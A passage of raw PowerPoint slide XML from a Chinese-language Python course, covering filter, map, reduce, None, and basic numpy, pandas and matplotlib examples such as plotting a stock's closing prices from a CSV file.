                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列表。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl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zh-C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([iterable, ...]) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Filter 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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sequence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>每个元素调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数，最后返回包含调用结果为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的元素。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a: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(function or None, sequence) -&gt;iterator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone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altLang="zh-CN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 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44009" y="1914107"/>
            <a:ext cx="4010247" cy="1815882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示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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[1, 2, 3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,4,5,0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输出大于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的元素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filter(lambda a:a&gt;3,x)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运行结果：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[4, 5]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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8344" y="4835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特殊关键字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 reduce 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290438" y="576173"/>
            <a:ext cx="8363818" cy="4138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/>
              <a:t>云计算的核心算法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  <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是将一个大任务拆分为很多个小任务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"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  <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reduce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则将每个小任务的计算结果进行收集和汇总</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"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输出大任务的最终结果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600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>遍历序列，对其中每个元素进行相应的操作，最终获得新的序列。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600" dirty="0"/>
              <a:t>    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map(function, sequence[, sequence, ...]) -&gt; iterator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对序列内的元素进行累计操作，返回一个结果。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200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>     # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>第一个参数函数必须要有两个参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>第二个参数循环的序列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>第三个参数初始值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRP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reduce(function,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 initializer])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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range(8)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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it-IT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zip(seq, map(lambda x:x*x,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it-IT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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT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[(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25), (6, 36), (7, 49)]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reduce(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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lambda x,y:x+y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(1, 11))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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55</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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59836" y="4835748"/>
            <a:ext cx="37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413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关键字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D5E3C-427B-4138-8529-87C99E49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39552" y="1059582"/>
            <a:ext cx="8229600" cy="26711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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特有的空值表示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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是不同的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函数没有明确返回的话，默认返回是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>None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不能与其它类型进行运算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13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23490" y="157532"/>
            <a:ext cx="334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数据处理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03784" y="987573"/>
            <a:ext cx="7549697" cy="3001517"/>
            <a:chOff x="903784" y="987573"/>
            <a:chExt cx="7549697" cy="3001517"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Picture 2" descr="牛皮纸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" t="3812" r="3680" b="4240"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="903784" y="987573"/>
              <a:ext cx="4689965" cy="2865581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533239" y="1419622"/>
              <a:ext cx="35428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n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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</a:p>
            <a:p>
              <a:pPr marL="571500" indent="-571500">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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pandas</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="571500" indent="-571500">
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="n"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>m</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3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atplotlib</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3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1" r="25263"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5069105" y="1131590"/>
              <a:ext cx="3384376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0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43704"/>
            <a:ext cx="2555875" cy="40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数据怎么处理合适？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60032" y="699542"/>
            <a:ext cx="3744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统计出个人总分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>统计出各学科平均分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>筛选出语数外都高于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>125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采用什么方法？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>复杂度如何？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>效率怎么样？</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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0" y="595313"/>
            <a:ext cx="4070003" cy="41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43704"/>
            <a:ext cx="2555875" cy="40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数据处理参考书目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62964"/>
            <a:ext cx="2880320" cy="3843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18" y="667528"/>
            <a:ext cx="3070160" cy="38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848" y="559296"/>
            <a:ext cx="8229600" cy="442144"/>
          </a:xfrm>
        </p:spPr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向量化运算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ndarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据结构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1063310"/>
            <a:ext cx="1512168" cy="682552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="04AEDA"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="04AED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ndarray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23528" y="156150"/>
            <a:ext cx="2555875" cy="40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Numpy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4788" y="915566"/>
            <a:ext cx="45184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n1=numpy.arange(1,12,2) #numpy.ndarray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n2=numpy.arange(0.1,10,0.5)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n3=numpy.array([ [1,2,3],[4,5,6] ])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n1=np.arange(24).reshape(2,3,4)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print(n1[1:,1:3,1:3] ) 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切片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print(np.vsplit(n1, 2))#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垂直分隔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print(np.split(n1, 2, axis=0))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print(type(n1),n1.shape)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR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a=np.random.rand(3, 2)*10//2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b=np.arange(6).reshape(2,3)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print(a*a,np.dot(a,b))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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print(a.flatten().tolist())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EE0201-9821-4E98-ACFB-B2255ADC1005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607579" y="2099452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多为数组</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据类型相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>间无逗号有索引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6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69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23528" y="156150"/>
            <a:ext cx="324036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Numpy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结合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1600" dirty="0" err="1"/>
              <a:t>atplotlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>绘图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857EAF-3A68-4FAF-88B9-488F8857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89" y="559594"/>
            <a:ext cx="4498826" cy="4011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88150B5-1B79-4CF9-82C0-5FD24E6DC913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315026" y="602331"/>
            <a:ext cx="3896934" cy="4108817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# -*- coding: utf-8 -*-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>matplotlib.pyplot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>matplotlib.dates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>mdates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>pylab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>numpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> as np</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> bytespdate2num(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>, encoding='utf-8'):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>strconverter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> = mdates.strpdate2num(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>bytesconverter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(b):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>  s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>b.decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(encoding)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>strconverter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>bytesconverter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>date, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>openp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>closep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>highp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>lowp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>np.loadtxt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>('600000_noheader.csv',usecols=(0,1,2,3,4), delimiter=',', unpack=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>True,skiprows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>=(1),converters={0: bytespdate2num('%Y/%m/%d')})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.plot_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(date, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>closep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>,'-', label='Price')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.xlabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>('Date')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.ylabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>('Price')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>('Numpy Line Chart EXAMPLE')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>ax = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.gca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.xticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(rotation=90)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.subplots_adjust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(bottom=0.3) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>ax.xaxis.set_major_formatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>pl.DateFormatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>('%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>Y%m%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>')) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.grid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.legend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1"/>
              <a:t>plt.show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9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058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牛皮纸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3812" r="3680" b="4240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3286027" y="1032942"/>
            <a:ext cx="4242679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28957"/>
            <a:ext cx="334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基础部分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83968" y="1381736"/>
            <a:ext cx="2736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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>数据类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>流程控制语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:cs typeface="Courier New" panose="020703090202050204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9283">
            <a:off x="1276193" y="895573"/>
            <a:ext cx="2762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19240-0137-45F9-8414-29B4E8B8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3478"/>
            <a:ext cx="2314600" cy="421555"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Matpliot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它效果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91C73-7298-47C5-8CFE-9536AEA0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3" y="771550"/>
            <a:ext cx="4102765" cy="2952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D20E79-78C5-4E2F-A037-87377ECBE1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30" y="1131590"/>
            <a:ext cx="4377260" cy="325715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70</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="04AE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77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04030"/>
            <a:ext cx="8229600" cy="4421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Pandas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常用两种数据结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Series, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DataFrame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1461671"/>
            <a:ext cx="1512168" cy="682552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
